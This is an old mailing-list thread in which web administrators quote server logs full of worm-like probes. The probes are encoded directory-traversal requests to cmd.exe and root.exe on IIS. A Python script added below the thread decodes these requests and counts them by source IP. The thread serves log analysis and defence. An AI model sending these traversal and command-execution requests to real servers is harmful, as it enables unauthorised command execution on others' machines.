
Re: [cobalt-users] Extensive Hack Attack - Was C drive hack



David Thurman wrote:

> on 9-18-01 8:49 AM, Paul Alcock at webmgr@xxxxxxxxxxxxxxxxxx was reported to
> have made a statement that said this:
>
> >> I am getting a lot of these logged on every IP routed to my
> >> machine that has
> >> a site.
> >>
> >> www.site.com 216.234.235.118 - - [18/Sep/2001:06:49:52 -0700] "GET
> >> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
> >>
> >> www.site.com 216.234.199.92 - - [18/Sep/2001:06:51:19 -0700] "GET
> >> /MSADC/root.exe?/c+dir HTTP/1.0" 302 231 "-" "-"
> >>
> >> www.adifferentsite.com 66.12.10.51 - - [18/Sep/2001:06:51:16 -0700] "GET
> >> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302
> >> 254 "-" "-"
> > Ditto, the frequency is much worse than Code Red or Code Red II.
> > I'm guessing that I'm logging more than 100 per minute.
> > Major pain. Any way to detect the origin or at least a waypoint?
> >
> >
> > --sig
> > Paul Alcock

Ditto, we are too. What do the lines mean exactly? Since 9 a.m. and still going
on I guess, my log shows tons of calls like this from the same IP, and also very
many different IPs doing the multi calls. Please enlighten, and thank you.

Regards, Nell Bolen
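
An added example, not part of the original posts: one way to answer "what do the lines mean" and "which IPs" from the log itself. It parses the vhost-prefixed access-log lines quoted above (re-joined onto single lines), percent-decodes each request path until it stops changing, and tallies requests for `cmd.exe` or `root.exe` by source IP and virtual host. The function and variable names are my own.

```python
import re
from collections import Counter
from urllib.parse import unquote

# The three log lines quoted in the thread, re-joined onto single lines.
SAMPLE = r'''www.site.com 216.234.235.118 - - [18/Sep/2001:06:49:52 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.site.com 216.234.199.92 - - [18/Sep/2001:06:51:19 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 231 "-" "-"
www.adifferentsite.com 66.12.10.51 - - [18/Sep/2001:06:51:16 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 254 "-" "-"
'''

# vhost, client IP, timestamp, request line, status (layout as shown in the thread).
LINE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+')
PROBE = re.compile(r'/(cmd|root)\.exe$', re.I)

def decode_path(target, max_rounds=3):
    """Strip the query, then percent-decode repeatedly: '%%35c' -> '%5c' -> '\\'."""
    path = target.split('?', 1)[0]
    for _ in range(max_rounds):
        nxt = unquote(path, errors='replace')
        if nxt == path:
            break
        path = nxt
    return path.replace('\\', '/')   # show Windows separators as '/'

def scan(lines):
    """Tally probe requests by source IP and vhost; list any answered with 200."""
    by_ip, by_vhost, served = Counter(), Counter(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                  # not in the expected log layout
        path = decode_path(m['target'])
        if PROBE.search(path):
            by_ip[m['ip']] += 1
            by_vhost[m['vhost']] += 1
            if m['status'] == '200':  # the server actually returned content
                served.append((m['ts'], m['ip'], path))
    return {'by_ip': by_ip, 'by_vhost': by_vhost, 'served': served}

if __name__ == '__main__':
    report = scan(SAMPLE.splitlines())
    for ip, n in report['by_ip'].most_common():
        print(n, ip)
    print('answered with 200:', report['served'])
```

On the three quoted lines every probe was answered with 400 or 302, so `served` is empty; a non-empty list is what would need a closer look.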